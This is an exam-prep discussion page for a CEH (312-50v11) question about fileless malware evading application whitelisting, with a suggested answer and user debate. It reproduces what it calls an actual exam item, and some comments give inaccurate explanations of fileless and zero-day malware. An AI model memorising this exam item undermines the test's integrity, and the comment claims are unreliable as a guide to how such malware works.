ExamTopics Logo
Mail Us[email protected]
Menu
Eccouncil Discussions
exam questions

Exam 312-50v11 All Questions

View all questions & answers for the 312-50v11 exam
Go to Exam

Exam 312-50v11 topic 1 question 164 discussion

Actual exam question from ECCouncil's 312-50v11
Question #: 164
Topic #: 1
[All 312-50v11 Questions]

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs.
What type of malware did the attacker use to bypass the company's application whitelisting?

  • A. File-less malware
  • B. Zero-day malware
  • C. Phishing malware
  • D. Logic bomb malware
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by cerzocuspi at April 17, 2021, 1:56 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
cerzocuspi
Highly Voted 2 years ago
IDS/IPS has not reported on any non-whitelisted programs. File-less malware
upvoted 9 times
...
Animal22
Highly Voted 10 months, 2 weeks ago
It can't be "zero-day" malware because the company is whitelisting applications. That means that NOTHING can run unless it has been expressly allowed. It doesn't matter if the exploit / malware is known or not. It can't run because it is not whitelisted. File-less malware is attached to another file. In this case, one that is whitelisted.
upvoted 6 times
...
Daniel8660
Most Recent 6 months, 3 weeks ago
Selected Answer: A
Fileless Malware Fileless malware can easily evade various security controls, organizations need to focus on monitoring, detecting, and preventing malicious activities instead of using traditional approaches such as scanning for malware through file signatures.Also known as non-malware, infects legitimate software, applications, and other protocols existing in the system to perform various malicious activities.It resides in the system’s RAM. It injects malicious code into the running processes. (P.966/950)
upvoted 5 times
...
pinguin666
10 months ago
At first I would have sworn Zero-day but reading it again and again the keyword is "bypass the company's application whitelisting" that would point at fileless.
upvoted 4 times
...
Novmejst
1 year, 4 months ago
A. File-less malware
upvoted 1 times
...
martco
1 year, 5 months ago
terminology there is no "zero-day malware", it's just "malware" which of course could be introduced by as a component of a zero-day exploit campaign by an expert somebody whom correctly identifies a zero-day vulnerability in the system to be attacked
upvoted 3 times
...
jinjection
1 year, 6 months ago
No sense it can be a zery-day malware too......
upvoted 3 times
...
whysoserious1199
1 year, 8 months ago
File less malware and zero day both are correct.. depends on which answer ec council likes more..
upvoted 3 times
brdweek
1 year, 6 months ago
IDS/IPS has not reported on any non-whitelisted programs
upvoted 2 times
...
...
M4E_55
1 year, 9 months ago
Why not zero-day? Antivirus or IDS cannot detect if it's a new one and they don't have signatures...
upvoted 1 times
beowolf
1 year, 7 months ago
in some cases it can detect based on behavior
upvoted 1 times
...
spydog
1 year, 6 months ago
I believe there is no such think as zero-day malware. There is zero-day exploit/vulnerability, but there is no definition for zero-day malware.
upvoted 4 times
...
...
HayatoK
1 year, 9 months ago
IDS monitors traffic on the network, so you should be able to find any unusual communications, but why can't you find fileless malware?
upvoted 1 times
...
ANDRESCB1988
1 year, 9 months ago
correct
upvoted 1 times
...
Grezavi
1 year, 10 months ago
https://www.mcafee.com/enterprise/en-us/security-awareness/ransomware/what-is-fileless-malware.html
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago